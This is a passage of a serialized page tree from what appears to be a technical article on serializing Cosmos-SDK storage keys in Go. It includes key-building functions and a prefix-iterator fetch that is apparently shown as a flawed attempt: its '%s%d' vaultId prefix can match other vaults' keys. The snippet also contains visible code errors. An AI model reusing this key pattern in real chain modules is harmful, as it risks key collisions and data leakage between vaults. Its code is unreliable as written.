)\n}\n",[89850],{"type":26,"tag":130,"props":89851,"children":89852},{"__ignoreMap":7},[89853,89864,89879,89906,89931,89938,89945,89952,89967,89982,90009,90032,90051,90066,90101,90108,90143,90150,90169,90184,90219,90226,90261,90268,90295,90307,90319,90330,90341,90352,90363,90374,90381,90388,90395,90402,90417,90432,90459,90482,90501,90516,90551,90558,90593,90600,90619,90634,90669,90676,90711,90718,90745,90756,90768,90779,90790,90801,90812,90823,90831],{"type":26,"tag":137,"props":89854,"children":89855},{"class":5559,"line":5560},[89856,89860],{"type":26,"tag":137,"props":89857,"children":89858},{"style":5573},[89859],{"type":32,"value":12244},{"type":26,"tag":137,"props":89861,"children":89862},{"style":5601},[89863],{"type":32,"value":81168},{"type":26,"tag":137,"props":89865,"children":89866},{"class":5559,"line":5412},[89867,89871,89875],{"type":26,"tag":137,"props":89868,"children":89869},{"style":5584},[89870],{"type":32,"value":87933},{"type":26,"tag":137,"props":89872,"children":89873},{"style":5590},[89874],{"type":32,"value":5593},{"type":26,"tag":137,"props":89876,"children":89877},{"style":6837},[89878],{"type":32,"value":87942},{"type":26,"tag":137,"props":89880,"children":89881},{"class":5559,"line":5417},[89882,89887,89891,89896,89901],{"type":26,"tag":137,"props":89883,"children":89884},{"style":5584},[89885],{"type":32,"value":89886},"    PositionMapPrefix",{"type":26,"tag":137,"props":89888,"children":89889},{"style":5590},[89890],{"type":32,"value":5593},{"type":26,"tag":137,"props":89892,"children":89893},{"style":6837},[89894],{"type":32,"value":89895}," \"",{"type":26,"tag":137,"props":89897,"children":89898},{"style":50975},[89899],{"type":32,"value":89900},"\\x01",{"type":26,"tag":137,"props":89902,"children":89903},{"style":6837},[89904],{"type":32,"value":89905},"\"\n",{"type":26,"tag":137,"props":89907,"children":89908},{"class":5559,"line":5642},[89909,89914,89918,89922,89927],{"type":26,"tag":137,"props":89910,"children":89911},{"style":5584},[89912],{"type":32,"value":89913},"    AddressMapPrefix",{"type":26,"tag":137,"props":89915,"children":89916},{"style":5590},[89917],{"type":32,"value":5593},{"type":26,"tag":137,"props":89919,"children":89920},{"style":6837},[89921],{"type":32,"value":89895},{"type":26,"tag":137,"props":89923,"children":89924},{"style":50975},[89925],{"type":32,"value":89926},"\\x02",{"type":26,"tag":137,"props":89928,"children":89929},{"style":6837},[89930],{"type":32,"value":89905},{"type":26,"tag":137,"props":89932,"children":89933},{"class":5559,"line":5745},[89934],{"type":26,"tag":137,"props":89935,"children":89936},{"style":5601},[89937],{"type":32,"value":5742},{"type":26,"tag":137,"props":89939,"children":89940},{"class":5559,"line":5850},[89941],{"type":26,"tag":137,"props":89942,"children":89943},{"emptyLinePlaceholder":18},[89944],{"type":32,"value":6276},{"type":26,"tag":137,"props":89946,"children":89947},{"class":5559,"line":5878},[89948],{"type":26,"tag":137,"props":89949,"children":89950},{"emptyLinePlaceholder":18},[89951],{"type":32,"value":6276},{"type":26,"tag":137,"props":89953,"children":89954},{"class":5559,"line":5891},[89955,89959,89963],{"type":26,"tag":137,"props":89956,"children":89957},{"style":5573},[89958],{"type":32,"value":78903},{"type":26,"tag":137,"props":89960,"children":89961},{"style":5682},[89962],{"type":32,"value":88961},{"type":26,"tag":137,"props":89964,"children":89965},{"style":5601},[89966],{"type":32,"value":6054},{"type":26,"tag":137,"props":89968,"children":89969},{"class":5559,"line":5909},[89970,89974,89978],{"type":26,"tag":137,"props":89971,"children":89972},{"style":5584},[89973],{"type":32,"value":87849},{"type":26,"tag":137,"props":89975,"children":89976},{"style":6009},[89977],{"type":32,"value":79024},{"type":26,"tag":137,"props":89979,"children":89980},{"style":5601},[89981],{"type":32,"value":6099},{"type":26,"tag":137,"props":89983,"children":89984},{"class":5559,"line":5930},[89985,89989,89993,89997,90001,90005],{"type":26,"tag":137,"props":89986,"children":89987},{"style":5584},[89988],{"type":32,"value":87861},{"type":26,"tag":137,"props":89990,"children":89991},{"style":5601},[89992],{"type":32,"value":1108},{"type":26,"tag":137,"props":89994,"children":89995},{"style":5584},[89996],{"type":32,"value":88342},{"type":26,"tag":137,"props":89998,"children":89999},{"style":5601},[90000],{"type":32,"value":78830},{"type":26,"tag":137,"props":90002,"children":90003},{"style":6009},[90004],{"type":32,"value":87367},{"type":26,"tag":137,"props":90006,"children":90007},{"style":5601},[90008],{"type":32,"value":6099},{"type":26,"tag":137,"props":90010,"children":90011},{"class":5559,"line":5939},[90012,90016,90020,90024,90028],{"type":26,"tag":137,"props":90013,"children":90014},{"style":5601},[90015],{"type":32,"value":78985},{"type":26,"tag":137,"props":90017,"children":90018},{"style":5584},[90019],{"type":32,"value":74757},{"type":26,"tag":137,"props":90021,"children":90022},{"style":5601},[90023],{"type":32,"value":78830},{"type":26,"tag":137,"props":90025,"children":90026},{"style":6009},[90027],{"type":32,"value":87367},{"type":26,"tag":137,"props":90029,"children":90030},{"style":5601},[90031],{"type":32,"value":17395},{"type":26,"tag":137,"props":90033,"children":90034},{"class":5559,"line":6191},[90035,90039,90043,90047],{"type":26,"tag":137,"props":90036,"children":90037},{"style":5584},[90038],{"type":32,"value":88463},{"type":26,"tag":137,"props":90040,"children":90041},{"style":5590},[90042],{"type":32,"value":79019},{"type":26,"tag":137,"props":90044,"children":90045},{"style":5682},[90046],{"type":32,"value":88166},{"type":26,"tag":137,"props":90048,"children":90049},{"style":5601},[90050],{"type":32,"value":6054},{"type":26,"tag":137,"props":90052,"children":90053},{"class":5559,"line":6208},[90054,90058,90062],{"type":26,"tag":137,"props":90055,"children":90056},{"style":5601},[90057],{"type":32,"value":89057},{"type":26,"tag":137,"props":90059,"children":90060},{"style":6009},[90061],{"type":32,"value":87367},{"type":26,"tag":137,"props":90063,"children":90064},{"style":5601},[90065],{"type":32,"value":6099},{"type":26,"tag":137,"props":90067,"children":90068},{"class":5559,"line":6225},[90069,90073,90077,90081,90085,90089,90093,90097],{"type":26,"tag":137,"props":90070,"children":90071},{"style":5584},[90072],{"type":32,"value":89073},{"type":26,"tag":137,"props":90074,"children":90075},{"style":5601},[90076],{"type":32,"value":470},{"type":26,"tag":137,"props":90078,"children":90079},{"style":5682},[90080],{"type":32,"value":88203},{"type":26,"tag":137,"props":90082,"children":90083},{"style":5601},[90084],{"type":32,"value":165},{"type":26,"tag":137,"props":90086,"children":90087},{"style":5682},[90088],{"type":32,"value":11727},{"type":26,"tag":137,"props":90090,"children":90091},{"style":5601},[90092],{"type":32,"value":165},{"type":26,"tag":137,"props":90094,"children":90095},{"style":5584},[90096],{"type":32,"value":88073},{"type":26,"tag":137,"props":90098,"children":90099},{"style":5601},[90100],{"type":32,"value":88224},{"type":26,"tag":137,"props":90102,"children":90103},{"class":5559,"line":6238},[90104],{"type":26,"tag":137,"props":90105,"children":90106},{"style":5601},[90107],{"type":32,"value":26510},{"type":26,"tag":137,"props":90109,"children":90110},{"class":5559,"line":6247},[90111,90115,90119,90123,90127,90131,90135,90139],{"type":26,"tag":137,"props":90112,"children":90113},{"style":5584},[90114],{"type":32,"value":88194},{"type":26,"tag":137,"props":90116,"children":90117},{"style":5601},[90118],{"type":32,"value":470},{"type":26,"tag":137,"props":90120,"children":90121},{"style":5682},[90122],{"type":32,"value":88248},{"type":26,"tag":137,"props":90124,"children":90125},{"style":5601},[90126],{"type":32,"value":165},{"type":26,"tag":137,"props":90128,"children":90129},{"style":5584},[90130],{"type":32,"value":88157},{"type":26,"tag":137,"props":90132,"children":90133},{"style":5601},[90134],{"type":32,"value":1108},{"type":26,"tag":137,"props":90136,"children":90137},{"style":5584},[90138],{"type":32,"value":88073},{"type":26,"tag":137,"props":90140,"children":90141},{"style":5601},[90142],{"type":32,"value":5742},{"type":26,"tag":137,"props":90144,"children":90145},{"class":5559,"line":6270},[90146],{"type":26,"tag":137,"props":90147,"children":90148},{"emptyLinePlaceholder":18},[90149],{"type":32,"value":6276},{"type":26,"tag":137,"props":90151,"children":90152},{"class":5559,"line":6279},[90153,90157,90161,90165],{"type":26,"tag":137,"props":90154,"children":90155},{"style":5584},[90156],{"type":32,"value":89158},{"type":26,"tag":137,"props":90158,"children":90159},{"style":5590},[90160],{"type":32,"value":79019},{"type":26,"tag":137,"props":90162,"children":90163},{"style":5682},[90164],{"type":32,"value":88166},{"type":26,"tag":137,"props":90166,"children":90167},{"style":5601},[90168],{"type":32,"value":6054},{"type":26,"tag":137,"props":90170,"children":90171},{"class":5559,"line":6288},[90172,90176,90180],{"type":26,"tag":137,"props":90173,"children":90174},{"style":5601},[90175],{"type":32,"value":89057},{"type":26,"tag":137,"props":90177,"children":90178},{"style":6009},[90179],{"type":32,"value":87367},{"type":26,"tag":137,"props":90181,"children":90182},{"style":5601},[90183],{"type":32,"value":6099},{"type":26,"tag":137,"props":90185,"children":90186},{"class":5559,"line":6355},[90187,90191,90195,90199,90203,90207,90211,90215],{"type":26,"tag":137,"props":90188,"children":90189},{"style":5584},[90190],{"type":32,"value":89073},{"type":26,"tag":137,"props":90192,"children":90193},{"style":5601},[90194],{"type":32,"value":470},{"type":26,"tag":137,"props":90196,"children":90197},{"style":5682},[90198],{"type":32,"value":88203},{"type":26,"tag":137,"props":90200,"children":90201},{"style":5601},[90202],{"type":32,"value":165},{"type":26,"tag":137,"props":90204,"children":90205},{"style":5682},[90206],{"type":32,"value":11727},{"type":26,"tag":137,"props":90208,"children":90209},{"style":5601},[90210],{"type":32,"value":165},{"type":26,"tag":137,"props":90212,"children":90213},{"style":5584},[90214],{"type":32,"value":88342},{"type":26,"tag":137,"props":90216,"children":90217},{"style":5601},[90218],{"type":32,"value":88224},{"type":26,"tag":137,"props":90220,"children":90221},{"class":5559,"line":6363},[90222],{"type":26,"tag":137,"props":90223,"children":90224},{"style":5601},[90225],{"type":32,"value":26510},{"type":26,"tag":137,"props":90227,"children":90228},{"class":5559,"line":6393},[90229,90233,90237,90241,90245,90249,90253,90257],{"type":26,"tag":137,"props":90230,"children":90231},{"style":5584},[90232],{"type":32,"value":88194},{"type":26,"tag":137,"props":90234,"children":90235},{"style":5601},[90236],{"type":32,"value":470},{"type":26,"tag":137,"props":90238,"children":90239},{"style":5682},[90240],{"type":32,"value":88248},{"type":26,"tag":137,"props":90242,"children":90243},{"style":5601},[90244],{"type":32,"value":165},{"type":26,"tag":137,"props":90246,"children":90247},{"style":5584},[90248],{"type":32,"value":88283},{"type":26,"tag":137,"props":90250,"children":90251},{"style":5601},[90252],{"type":32,"value":1108},{"type":26,"tag":137,"props":90254,"children":90255},{"style":5584},[90256],{"type":32,"value":88342},{"type":26,"tag":137,"props":90258,"children":90259},{"style":5601},[90260],{"type":32,"value":5742},{"type":26,"tag":137,"props":90262,"children":90263},{"class":5559,"line":6401},[90264],{"type":26,"tag":137,"props":90265,"children":90266},{"emptyLinePlaceholder":18},[90267],{"type":32,"value":6276},{"type":26,"tag":137,"props":90269,"children":90270},{"class":5559,"line":6433},[90271,90275,90279,90283,90287,90291],{"type":26,"tag":137,"props":90272,"children":90273},{"style":5584},[90274],{"type":32,"value":89277},{"type":26,"tag":137,"props":90276,"children":90277},{"style":5590},[90278],{"type":32,"value":79019},{"type":26,"tag":137,"props":90280,"children":90281},{"style":5584},[90282],{"type":32,"value":84836},{"type":26,"tag":137,"props":90284,"children":90285},{"style":5601},[90286],{"type":32,"value":470},{"type":26,"tag":137,"props":90288,"children":90289},{"style":5682},[90290],{"type":32,"value":87825},{"type":26,"tag":137,"props":90292,"children":90293},{"style":5601},[90294],{"type":32,"value":6054},{"type":26,"tag":137,"props":90296,"children":90297},{"class":5559,"line":6441},[90298,90303],{"type":26,"tag":137,"props":90299,"children":90300},{"style":6837},[90301],{"type":32,"value":90302},"        \"%s%d%s%s%s%s\"",{"type":26,"tag":137,"props":90304,"children":90305},{"style":5601},[90306],{"type":32,"value":6099},{"type":26,"tag":137,"props":90308,"children":90309},{"class":5559,"line":6501},[90310,90315],{"type":26,"tag":137,"props":90311,"children":90312},{"style":5584},[90313],{"type":32,"value":90314},"        PositionMapPrefix",{"type":26,"tag":137,"props":90316,"children":90317},{"style":5601},[90318],{"type":32,"value":6099},{"type":26,"tag":137,"props":90320,"children":90321},{"class":5559,"line":11634},[90322,90326],{"type":26,"tag":137,"props":90323,"children":90324},{"style":5584},[90325],{"type":32,"value":89317},{"type":26,"tag":137,"props":90327,"children":90328},{"style":5601},[90329],{"type":32,"value":6099},{"type":26,"tag":137,"props":90331,"children":90332},{"class":5559,"line":11652},[90333,90337],{"type":26,"tag":137,"props":90334,"children":90335},{"style":5584},[90336],{"type":32,"value":89329},{"type":26,"tag":137,"props":90338,"children":90339},{"style":5601},[90340],{"type":32,"value":6099},{"type":26,"tag":137,"props":90342,"children":90343},{"class":5559,"line":11697},[90344,90348],{"type":26,"tag":137,"props":90345,"children":90346},{"style":5584},[90347],{"type":32,"value":89341},{"type":26,"tag":137,"props":90349,"children":90350},{"style":5601},[90351],{"type":32,"value":6099},{"type":26,"tag":137,"props":90353,"children":90354},{"class":5559,"line":11803},[90355,90359],{"type":26,"tag":137,"props":90356,"children":90357},{"style":5584},[90358],{"type":32,"value":89329},{"type":26,"tag":137,"props":90360,"children":90361},{"style":5601},[90362],{"type":32,"value":6099},{"type":26,"tag":137,"props":90364,"children":90365},{"class":5559,"line":26089},[90366,90370],{"type":26,"tag":137,"props":90367,"children":90368},{"style":5584},[90369],{"type":32,"value":89364},{"type":26,"tag":137,"props":90371,"children":90372},{"style":5601},[90373],{"type":32,"value":6099},{"type":26,"tag":137,"props":90375,"children":90376},{"class":5559,"line":26124},[90377],{"type":26,"tag":137,"props":90378,"children":90379},{"style":5601},[90380],{"type":32,"value":26510},{"type":26,"tag":137,"props":90382,"children":90383},{"class":5559,"line":26132},[90384],{"type":26,"tag":137,"props":90385,"children":90386},{"style":5601},[90387],{"type":32,"value":6507},{"type":26,"tag":137,"props":90389,"children":90390},{"class":5559,"line":26140},[90391],{"type":26,"tag":137,"props":90392,"children":90393},{"emptyLinePlaceholder":18},[90394],{"type":32,"value":6276},{"type":26,"tag":137,"props":90396,"children":90397},{"class":5559,"line":26149},[90398],{"type":26,"tag":137,"props":90399,"children":90400},{"emptyLinePlaceholder":18},[90401],{"type":32,"value":6276},{"type":26,"tag":137,"props":90403,"children":90404},{"class":5559,"line":26191},[90405,90409,90413],{"type":26,"tag":137,"props":90406,"children":90407},{"style":5573},[90408],{"type":32,"value":78903},{"type":26,"tag":137,"props":90410,"children":90411},{"style":5682},[90412],{"type":32,"value":89408},{"type":26,"tag":137,"props":90414,"children":90415},{"style":5601},[90416],{"type":32,"value":6054},{"type":26,"tag":137,"props":90418,"children":90419},{"class":5559,"line":26224},[90420,90424,90428],{"type":26,"tag":137,"props":90421,"children":90422},{"style":5584},[90423],{"type":32,"value":87849},{"type":26,"tag":137,"props":90425,"children":90426},{"style":6009},[90427],{"type":32,"value":79024},{"type":26,"tag":137,"props":90429,"children":90430},{"style":5601},[90431],{"type":32,"value":6099},{"type":26,"tag":137,"props":90433,"children":90434},{"class":5559,"line":26232},[90435,90439,90443,90447,90451,90455],{"type":26,"tag":137,"props":90436,"children":90437},{"style":5584},[90438],{"type":32,"value":87861},{"type":26,"tag":137,"props":90440,"children":90441},{"style":5601},[90442],{"type":32,"value":1108},{"type":26,"tag":137,"props":90444,"children":90445},{"style":5584},[90446],{"type":32,"value":89443},{"type":26,"tag":137,"props":90448,"children":90449},{"style":5601},[90450],{"type":32,"value":78830},{"type":26,"tag":137,"props":90452,"children":90453},{"style":6009},[90454],{"type":32,"value":87367},{"type":26,"tag":137,"props":90456,"children":90457},{"style":5601},[90458],{"type":32,"value":6099},{"type":26,"tag":137,"props":90460,"children":90461},{"class":5559,"line":26240},[90462,90466,90470,90474,90478],{"type":26,"tag":137,"props":90463,"children":90464},{"style":5601},[90465],{"type":32,"value":78985},{"type":26,"tag":137,"props":90467,"children":90468},{"style":5584},[90469],{"type":32,"value":74757},{"type":26,"tag":137,"props":90471,"children":90472},{"style":5601},[90473],{"type":32,"value":78830},{"type":26,"tag":137,"props":90475,"children":90476},{"style":6009},[90477],{"type":32,"value":87367},{"type":26,"tag":137,"props":90479,"children":90480},{"style":5601},[90481],{"type":32,"value":17395},{"type":26,"tag":137,"props":90483,"children":90484},{"class":5559,"line":26249},[90485,90489,90493,90497],{"type":26,"tag":137,"props":90486,"children":90487},{"style":5584},[90488],{"type":32,"value":88463},{"type":26,"tag":137,"props":90490,"children":90491},{"style":5590},[90492],{"type":32,"value":79019},{"type":26,"tag":137,"props":90494,"children":90495},{"style":5682},[90496],{"type":32,"value":88166},{"type":26,"tag":137,"props":90498,"children":90499},{"style":5601},[90500],{"type":32,"value":6054},{"type":26,"tag":137,"props":90502,"children":90503},{"class":5559,"line":26325},[90504,90508,90512],{"type":26,"tag":137,"props":90505,"children":90506},{"style":5601},[90507],{"type":32,"value":89057},{"type":26,"tag":137,"props":90509,"children":90510},{"style":6009},[90511],{"type":32,"value":87367},{"type":26,"tag":137,"props":90513,"children":90514},{"style":5601},[90515],{"type":32,"value":6099},{"type":26,"tag":137,"props":90517,"children":90518},{"class":5559,"line":26358},[90519,90523,90527,90531,90535,90539,90543,90547],{"type":26,"tag":137,"props":90520,"children":90521},{"style":5584},[90522],{"type":32,"value":89073},{"type":26,"tag":137,"props":90524,"children":90525},{"style":5601},[90526],{"type":32,"value":470},{"type":26,"tag":137,"props":90528,"children":90529},{"style":5682},[90530],{"type":32,"value":88203},{"type":26,"tag":137,"props":90532,"children":90533},{"style":5601},[90534],{"type":32,"value":165},{"type":26,"tag":137,"props":90536,"children":90537},{"style":5682},[90538],{"type":32,"value":11727},{"type":26,"tag":137,"props":90540,"children":90541},{"style":5601},[90542],{"type":32,"value":165},{"type":26,"tag":137,"props":90544,"children":90545},{"style":5584},[90546],{"type":32,"value":88073},{"type":26,"tag":137,"props":90548,"children":90549},{"style":5601},[90550],{"type":32,"value":88224},{"type":26,"tag":137,"props":90552,"children":90553},{"class":5559,"line":26366},[90554],{"type":26,"tag":137,"props":90555,"children":90556},{"style":5601},[90557],{"type":32,"value":26510},{"type":26,"tag":137,"props":90559,"children":90560},{"class":5559,"line":26374},[90561,90565,90569,90573,90577,90581,90585,90589],{"type":26,"tag":137,"props":90562,"children":90563},{"style":5584},[90564],{"type":32,"value":88194},{"type":26,"tag":137,"props":90566,"children":90567},{"style":5601},[90568],{"type":32,"value":470},{"type":26,"tag":137,"props":90570,"children":90571},{"style":5682},[90572],{"type":32,"value":88248},{"type":26,"tag":137,"props":90574,"children":90575},{"style":5601},[90576],{"type":32,"value":165},{"type":26,"tag":137,"props":90578,"children":90579},{"style":5584},[90580],{"type":32,"value":88157},{"type":26,"tag":137,"props":90582,"children":90583},{"style":5601},[90584],{"type":32,"value":1108},{"type":26,"tag":137,"props":90586,"children":90587},{"style":5584},[90588],{"type":32,"value":88073},{"type":26,"tag":137,"props":90590,"children":90591},{"style":5601},[90592],{"type":32,"value":5742},{"type":26,"tag":137,"props":90594,"children":90595},{"class":5559,"line":26411},[90596],{"type":26,"tag":137,"props":90597,"children":90598},{"emptyLinePlaceholder":18},[90599],{"type":32,"value":6276},{"type":26,"tag":137,"props":90601,"children":90602},{"class":5559,"line":26424},[90603,90607,90611,90615],{"type":26,"tag":137,"props":90604,"children":90605},{"style":5584},[90606],{"type":32,"value":89600},{"type":26,"tag":137,"props":90608,"children":90609},{"style":5590},[90610],{"type":32,"value":79019},{"type":26,"tag":137,"props":90612,"children":90613},{"style":5682},[90614],{"type":32,"value":88166},{"type":26,"tag":137,"props":90616,"children":90617},{"style":5601},[90618],{"type":32,"value":6054},{"type":26,"tag":137,"props":90620,"children":90621},{"class":5559,"line":26437},[90622,90626,90630],{"type":26,"tag":137,"props":90623,"children":90624},{"style":5601},[90625],{"type":32,"value":89057},{"type":26,"tag":137,"props":90627,"children":90628},{"style":6009},[90629],{"type":32,"value":87367},{"type":26,"tag":137,"props":90631,"children":90632},{"style":5601},[90633],{"type":32,"value":6099},{"type":26,"tag":137,"props":90635,"children":90636},{"class":5559,"line":26450},[90637,90641,90645,90649,90653,90657,90661,90665],{"type":26,"tag":137,"props":90638,"children":90639},{"style":5584},[90640],{"type":32,"value":89073},{"type":26,"tag":137,"props":90642,"children":90643},{"style":5601},[90644],{"type":32,"value":470},{"type":26,"tag":137,"props":90646,"children":90647},{"style":5682},[90648],{"type":32,"value":88203},{"type":26,"tag":137,"props":90650,"children":90651},{"style":5601},[90652],{"type":32,"value":165},{"type":26,"tag":137,"props":90654,"children":90655},{"style":5682},[90656],{"type":32,"value":11727},{"type":26,"tag":137,"props":90658,"children":90659},{"style":5601},[90660],{"type":32,"value":165},{"type":26,"tag":137,"props":90662,"children":90663},{"style":5584},[90664],{"type":32,"value":89443},{"type":26,"tag":137,"props":90666,"children":90667},{"style":5601},[90668],{"type":32,"value":88224},{"type":26,"tag":137,"props":90670,"children":90671},{"class":5559,"line":26504},[90672],{"type":26,"tag":137,"props":90673,"children":90674},{"style":5601},[90675],{"type":32,"value":26510},{"type":26,"tag":137,"props":90677,"children":90678},{"class":5559,"line":26513},[90679,90683,90687,90691,90695,90699,90703,90707],{"type":26,"tag":137,"props":90680,"children":90681},{"style":5584},[90682],{"type":32,"value":88194},{"type":26,"tag":137,"props":90684,"children":90685},{"style":5601},[90686],{"type":32,"value":470},{"type":26,"tag":137,"props":90688,"children":90689},{"style":5682},[90690],{"type":32,"value":88248},{"type":26,"tag":137,"props":90692,"children":90693},{"style":5601},[90694],{"type":32,"value":165},{"type":26,"tag":137,"props":90696,"children":90697},{"style":5584},[90698],{"type":32,"value":89693},{"type":26,"tag":137,"props":90700,"children":90701},{"style":5601},[90702],{"type":32,"value":1108},{"type":26,"tag":137,"props":90704,"children":90705},{"style":5584},[90706],{"type":32,"value":89443},{"type":26,"tag":137,"props":90708,"children":90709},{"style":5601},[90710],{"type":32,"value":5742},{"type":26,"tag":137,"props":90712,"children":90713},{"class":5559,"line":34876},[90714],{"type":26,"tag":137,"props":90715,"children":90716},{"emptyLinePlaceholder":18},[90717],{"type":32,"value":6276},{"type":26,"tag":137,"props":90719,"children":90720},{"class":5559,"line":34897},[90721,90725,90729,90733,90737,90741],{"type":26,"tag":137,"props":90722,"children":90723},{"style":5584},[90724],{"type":32,"value":89277},{"type":26,"tag":137,"props":90726,"children":90727},{"style":5590},[90728],{"type":32,"value":79019},{"type":26,"tag":137,"props":90730,"children":90731},{"style":5584},[90732],{"type":32,"value":84836},{"type":26,"tag":137,"props":90734,"children":90735},{"style":5601},[90736],{"type":32,"value":470},{"type":26,"tag":137,"props":90738,"children":90739},{"style":5682},[90740],{"type":32,"value":87825},{"type":26,"tag":137,"props":90742,"children":90743},{"style":5601},[90744],{"type":32,"value":6054},{"type":26,"tag":137,"props":90746,"children":90747},{"class":5559,"line":83553},[90748,90752],{"type":26,"tag":137,"props":90749,"children":90750},{"style":6837},[90751],{"type":32,"value":90302},{"type":26,"tag":137,"props":90753,"children":90754},{"style":5601},[90755],{"type":32,"value":6099},{"type":26,"tag":137,"props":90757,"children":90758},{"class":5559,"line":83566},[90759,90764],{"type":26,"tag":137,"props":90760,"children":90761},{"style":5584},[90762],{"type":32,"value":90763},"        AddressMapPrefix",{"type":26,"tag":137,"props":90765,"children":90766},{"style":5601},[90767],{"type":32,"value":6099},{"type":26,"tag":137,"props":90769,"children":90770},{"class":5559,"line":83574},[90771,90775],{"type":26,"tag":137,"props":90772,"children":90773},{"style":5584},[90774],{"type":32,"value":89317},{"type":26,"tag":137,"props":90776,"children":90777},{"style":5601},[90778],{"type":32,"value":6099},{"type":26,"tag":137,"props":90780,"children":90781},{"class":5559,"line":83582},[90782,90786],{"type":26,"tag":137,"props":90783,"children":90784},{"style":5584},[90785],{"type":32,"value":89329},{"type":26,"tag":137,"props":90787,"children":90788},{"style":5601},[90789],{"type":32,"value":6099},{"type":26,"tag":137,"props":90791,"children":90792},{"class":5559,"line":83590},[90793,90797],{"type":26,"tag":137,"props":90794,"children":90795},{"style":5584},[90796],{"type":32,"value":89341},{"type":26,"tag":137,"props":90798,"children":90799},{"style":5601},[90800],{"type":32,"value":6099},{"type":26,"tag":137,"props":90802,"children":90803},{"class":5559,"line":83630},[90804,90808],{"type":26,"tag":137,"props":90805,"children":90806},{"style":5584},[90807],{"type":32,"value":89329},{"type":26,"tag":137,"props":90809,"children":90810},{"style":5601},[90811],{"type":32,"value":6099},{"type":26,"tag":137,"props":90813,"children":90814},{"class":5559,"line":83638},[90815,90819],{"type":26,"tag":137,"props":90816,"children":90817},{"style":5584},[90818],{"type":32,"value":89802},{"type":26,"tag":137,"props":90820,"children":90821},{"style":5601},[90822],{"type":32,"value":6099},{"type":26,"tag":137,"props":90824,"children":90826},{"class":5559,"line":90825},60,[90827],{"type":26,"tag":137,"props":90828,"children":90829},{"style":5601},[90830],{"type":32,"value":26510},{"type":26,"tag":137,"props":90832,"children":90834},{"class":5559,"line":90833},61,[90835],{"type":26,"tag":137,"props":90836,"children":90837},{"style":5601},[90838],{"type":32,"value":6507},{"type":26,"tag":35,"props":90840,"children":90841},{},[90842],{"type":32,"value":90843},"We now have a proper example of how to serialize storage keys.",{"type":26,"tag":35,"props":90845,"children":90846},{},[90847,90849,90854],{"type":32,"value":90848},"Nonetheless, there is more to storage than just this. As previously mentioned, storages are expected to support their original functionalities. In the case of ",{"type":26,"tag":130,"props":90850,"children":90852},{"className":90851},[],[90853],{"type":32,"value":69703},{"type":32,"value":90855},", data should still be retrievable through original keys.",{"type":26,"tag":35,"props":90857,"children":90858},{},[90859,90861,90867,90869,90874],{"type":32,"value":90860},"Let's look at a case where we want to retrieve all ",{"type":26,"tag":130,"props":90862,"children":90864},{"className":90863},[],[90865],{"type":32,"value":90866},"map[Username]map[PositionName]Position",{"type":32,"value":90868}," associated with a ",{"type":26,"tag":130,"props":90870,"children":90872},{"className":90871},[],[90873],{"type":32,"value":87737},{"type":32,"value":90875}," from the storage. How can we safely accomplish this?",{"type":26,"tag":35,"props":90877,"children":90878},{},[90879,90881,90886,90888,90894],{"type":32,"value":90880},"Fortunately, the Cosmos-SDK provides APIs to fetch all entries associated with a ",{"type":26,"tag":130,"props":90882,"children":90884},{"className":90883},[],[90885],{"type":32,"value":87808},{"type":32,"value":90887}," prefix. Below is an example of an attempt to fetch data with ",{"type":26,"tag":130,"props":90889,"children":90891},{"className":90890},[],[90892],{"type":32,"value":90893},"vaultId",{"type":32,"value":7072},{"type":26,"tag":5512,"props":90896,"children":90898},{"code":90897,"language":78767,"meta":7,"className":78768,"style":7},"func FetchPositionMapWithVaultId(\n    vaultId uint64,\n) ([]map[Username]map[PositionName]Position) {\n    values := map[Username]map[PositionName]Position{}\n    i := sdk.KVStorePrefixIterator(\n        kvStore,\n        fmt.Sprintf(\"%s%d\", PositionMapPrefix, vaultId)\n    )\n    for ; i.Valid(); i.Next() {\n        k := strings.split(i.Key(), Seperator)\n\n        username := make([]byte, hex.DecodedLen(k[0]))\n        _, err := hex.Decode(username, k[0])\n        if err != nil {\n            return nil, err\n        }\n\n        positionName := make([]byte, hex.DecodedLen(k[1]))\n        _, err := hex.Decode(positionName, k[1])\n        if err != nil {\n            return nil, err\n        }\n\n        if entry, ok := values[username]; !ok {\n            values[username] = make(map[PositionName])\n        }\n\n        values[username][positionName] = Position {\n            data: iterator.Value(),\n        }\n    }\n    return values\n}\n",[90899],{"type":26,"tag":130,"props":90900,"children":90901},{"__ignoreMap":7},[90902,90918,90933,90982,91034,91063,91075,91121,91128,91174,91229,91236,91300,91361,91384,91403,91410,91417,91477,91536,91559,91578,91585,91592,91645,91693,91700,91707,91747,91776,91783,91790,91802],{"type":26,"tag":137,"props":90903,"children":90904},{"class":5559,"line":5560},[90905,90909,90914],{"type":26,"tag":137,"props":90906,"children":90907},{"style":5573},[90908],{"type":32,"value":78903},{"type":26,"tag":137,"props":90910,"children":90911},{"style":5682},[90912],{"type":32,"value":90913}," FetchPositionMapWithVaultId",{"type":26,"tag":137,"props":90915,"children":90916},{"style":5601},[90917],{"type":32,"value":6054},{"type":26,"tag":137,"props":90919,"children":90920},{"class":5559,"line":5412},[90921,90925,90929],{"type":26,"tag":137,"props":90922,"children":90923},{"style":5584},[90924],{"type":32,"value":87849},{"type":26,"tag":137,"props":90926,"children":90927},{"style":6009},[90928],{"type":32,"value":79024},{"type":26,"tag":137,"props":90930,"children":90931},{"style":5601},[90932],{"type":32,"value":6099},{"type":26,"tag":137,"props":90934,"children":90935},{"class":5559,"line":5417},[90936,90941,90945,90949,90953,90957,90961,90965,90969,90973,90978],{"type":26,"tag":137,"props":90937,"children":90938},{"style":5601},[90939],{"type":32,"value":90940},") ([]",{"type":26,"tag":137,"props":90942,"children":90943},{"style":5573},[90944],{"type":32,"value":69703},{"type":26,"tag":137,"props":90946,"children":90947},{"style":5601},[90948],{"type":32,"value":3016},{"type":26,"tag":137,"props":90950,"children":90951},{"style":6009},[90952],{"type":32,"value":87754},{"type":26,"tag":137,"props":90954,"children":90955},{"style":5601},[90956],{"type":32,"value":3079},{"type":26,"tag":137,"props":90958,"children":90959},{"style":5573},[90960],{"type":32,"value":69703},{"type":26,"tag":137,"props":90962,"children":90963},{"style":5601},[90964],{"type":32,"value":3016},{"type":26,"tag":137,"props":90966,"children":90967},{"style":6009},[90968],{"type":32,"value":87771},{"type":26,"tag":137,"props":90970,"children":90971},{"style":5601},[90972],{"type":32,"value":3079},{"type":26,"tag":137,"props":90974,"children":90975},{"style":6009},[90976],{"type":32,"value":90977},"Position",{"type":26,"tag":137,"props":90979,"children":90980},{"style":5601},[90981],{"type":32,"value":17395},{"type":26,"tag":137,"props":90983,"children":90984},{"class":5559,"line":5642},[90985,90990,90994,90998,91002,91006,91010,91014,91018,91022,91026,91030],{"type":26,"tag":137,"props":90986,"children":90987},{"style":5